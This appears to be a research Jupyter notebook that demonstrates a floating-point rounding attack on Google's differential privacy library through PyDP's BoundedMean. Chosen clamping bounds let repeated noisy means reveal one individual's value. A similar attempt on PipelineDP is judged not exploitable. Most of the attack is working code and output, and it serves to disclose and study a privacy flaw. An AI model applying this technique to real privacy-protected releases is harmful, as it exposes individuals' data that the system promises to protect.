## Import libraries

In [1]:
# Note: v1.1.1 was the latest version available as of 31 December 2021
! pip install python-dp==1.1.1

You should consider upgrading via the '/Users/michael/.virtualenvs/psi/bin/python -m pip install --upgrade pip' command.


In [4]:
from pydp.algorithms.laplacian import BoundedMean
import numpy as np

## Start here

The general idea is that we have two datasets of binary values. We know that the first $2^{\texttt{num_vals_power}}$ terms are 0. We can tell if the "$2^{\texttt{num_vals_power}}+1$" term is 1.

We do this by clamping values to the range $\left[\frac{1+(2^{-53+\texttt{num_vals_power}}-2^{-52})}{2}, \frac{1+(2^{-53+\texttt{num_vals_power}})}{2} \right]$.

Then we take the mean. All 0 values are clamped to the lower end of the range; all 1 values are clamped to the upper end of the range. This means that a 1 value experiences "maximal round-up". For a value in the interval $[2^k,2^{k+1})$, then, we get a difference in sums of $\frac{2^k}{2^{52}}$. Here, the sensitivity of $|U-L|/2$ in [Google's library](https://github.com/google/differential-privacy/blob/4c867aae8ea6a6831d2ac0ab749cd5ae24e047b4/cc/algorithms/bounded-mean.h#L100-L101) evaluates to $2^{-53}$, so as the $k$ term in the final answer in the sum grows, we get a sensitivity that is $\frac{2^k}{2^{52}}*2^{-53} = 2^{k-1}$ higher than Google thinks.

(Note: there could be some off-by-1 sorts of errors in the evaluation above, but that's roughly what's going on, as illustrated by the success of the attack.)

In [3]:
import numpy as np
num_vals_power = 4 # means our start array is length 2**num_vals_power. Works for vals >= 2

start_dataset = np.zeros(2**num_vals_power)
x_new = np.append(start_dataset, 1)
y_new = np.append(start_dataset, 0)

lower = (1 + ((2**(-53 + num_vals_power) - 2**(-52))))*0.5
upper = (1 + (2**(-53 + num_vals_power))) * 0.5
# lower = (1 + ((2**(-24 + num_vals_power) - 2**(-24))))*0.5
# upper = (1 + (2**(-24 + num_vals_power))) * 0.5
epsilon = 1.0
delta = 0.0

from pydp.algorithms.laplacian import BoundedMean
weak_mean = BoundedMean(epsilon, delta, lower, upper, dtype="float")

In [4]:
arr_1_ans = []
arr_2_ans = []
for _ in range(10_000):
    arr_1_ans.append(weak_mean.quick_result(x_new))
    arr_2_ans.append(weak_mean.quick_result(y_new))

# Analyze frequency of results


In [5]:
# print the frequency of each answer
np.set_printoptions(precision=100)
the_ans = np.unique(arr_2_ans, return_counts = True)
print(the_ans)

the_ans = np.unique(arr_1_ans, return_counts = True)
print(the_ans)

(array([0.5000000000000008, 0.5000000000000009]), array([9975,   25]))
(array([0.5000000000000008, 0.5000000000000009]), array([   9, 9991]))


In [15]:
sized_4_u_filename = "sized_4_u.csv"
sized_4_v_filename = "sized_4_v.csv"

In [13]:
# set up pyspark
import os
os.environ['JAVA_HOME'] = "/Library/Java/JavaVirtualMachines/adoptopenjdk-8.jdk/Contents/Home"

import pyspark
sc = pyspark.SparkContext()

In [82]:
from pipeline_dp.private_spark import make_private
from pipeline_dp.aggregate_params import NoiseKind
from pipeline_dp import SumParams
import pipeline_dp

# when we compute a private sum, use laplace noise without partitioning
sum_params = SumParams(
    noise_kind=NoiseKind.LAPLACE,
    max_partitions_contributed=1,
    max_contributions_per_partition=1,
    min_value=lower,
    max_value=upper,
    public_partitions=[0],
    partition_extractor=lambda _: 0,
    value_extractor=lambda v: v[1])

def parse_line(l):
    print(l)
    i, v = l.split(',')
    return int(i), float(v)

def make_pipelinedp_release(filepath):
    sized_uid_u = sc.textFile(filepath).map(parse_line)

    accountant = pipeline_dp.NaiveBudgetAccountant(total_epsilon=epsilon * 2, total_delta=delta * 2)
    private_sized_uid_u = make_private(sized_uid_u, accountant, lambda v: v[0])

    # Calculate the private sum
    dp_result = private_sized_uid_u.mean(sum_params)
    accountant.compute_budgets()

    return dp_result.collect()[0][1] * len(x_new)

print(make_pipelinedp_release(sized_4_u_filename))
print(make_pipelinedp_release(sized_4_v_filename))

512.5312499843762
512.5312500056654


In [84]:
arr_1_ans = []
arr_2_ans = []
for i in range(100):
    print(i)
    arr_1_ans.append(make_pipelinedp_release(sized_4_u_filename))
    arr_2_ans.append(make_pipelinedp_release(sized_4_v_filename))
    
# print the frequency of each answer
np.set_printoptions(precision=100)
the_ans = np.unique(arr_2_ans, return_counts = True)
print(the_ans)


(array([512.5312499014121, 512.5312499090968, 512.5312499108799,
       512.531249915484 , 512.5312499232267, 512.5312499263088,
       512.5312499266042, 512.5312499341076, 512.5312499346052,
       512.5312499360751, 512.5312499410448, 512.531249941294 ,
       512.5312499422155, 512.5312499442412, 512.5312499442836,
       512.5312499444065, 512.531249945363 , 512.5312499463283,
       512.5312499487491, 512.5312499492301, 512.5312499501425,
       512.5312499514584, 512.5312499520675, 512.5312499524488,
       512.5312499531104, 512.5312499543493, 512.5312499548038,
       512.5312499556577, 512.5312499580656, 512.5312499584195,
       512.5312499584792, 512.5312499588632, 512.5312499595888,
       512.5312499600867, 512.5312499612356, 512.5312499615777,
       512.5312499620301, 512.531249962223 , 512.531249962364 ,
       512.5312499628266, 512.5312499638028, 512.5312499639745,
       512.5312499648865, 512.5312499655998, 512.5312499659243,
       512.5312499668463, 512.531249966

Not exploitable due to noise in the denominator.

In [85]:

the_ans = np.unique(arr_1_ans, return_counts = True)
print(the_ans)

(array([512.5312499144432, 512.5312499380292, 512.5312499407755,
       512.5312499428245, 512.5312499436596, 512.5312499505369,
       512.5312499531336, 512.5312499637204, 512.5312499686679,
       512.5312499698485, 512.5312499710757, 512.531249974664 ,
       512.5312499756935, 512.5312499761383, 512.5312499765826,
       512.5312499765906, 512.5312499768128, 512.5312499780802,
       512.5312499783043, 512.531249978473 , 512.5312499786355,
       512.5312499788125, 512.5312499810923, 512.5312499847267,
       512.5312499847796, 512.5312499865954, 512.5312499869699,
       512.5312499869938, 512.5312499885673, 512.5312499896655,
       512.5312499904412, 512.5312499912696, 512.5312499917815,
       512.5312499924584, 512.5312499924852, 512.5312499930174,
       512.5312499941375, 512.5312499950498, 512.5312499954842,
       512.5312499957481, 512.5312499958496, 512.5312499968486,
       512.5312499972173, 512.5312499978016, 512.5312499982572,
       512.5312499983339, 512.531249998

In [2]:
lower, upper

(0.5000000000000008, 0.5000000000000009)